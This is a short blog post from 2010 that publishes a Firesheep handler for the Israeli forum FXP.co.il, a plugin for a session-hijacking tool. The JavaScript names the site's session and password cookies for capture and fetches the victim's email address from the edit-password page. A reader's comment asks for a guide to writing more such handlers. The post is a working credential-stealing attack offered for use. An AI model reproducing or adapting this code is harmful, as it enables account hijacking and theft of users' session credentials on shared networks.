Pages

Search This Blog

Friday 12 November 2010

Firesheep => FXP.co.il Handler

// Author
// cityZombie <chebon9@gmail.com>
// For more handlers visit : http://firesheepfan.blogspot.com/

register({
  name: "FXP.co.il",
  domains: [ 'www.fxp.co.il' ],
  sessionCookieNames: [ 'bblastvisit','bblastactivity','bbsessionhash','bbuserid','bbpassword','bbnginxcache' ],
  identifyUser: function () {
    var req = this.siteUrl + "/profile.php?do=editpassword";
    var resp = this.httpGet(req);
    this.userName   = resp.body.querySelector("input[name='email']").value;
  }
});

1 comment:

  1. אם אתה יכול לעשות מדריך על איך אתה מוצא איזה קוקיז צריך לקחת בשביל להכין עוד כאלה קודים לאתרים אני ישמח :D

    תודה

    ReplyDelete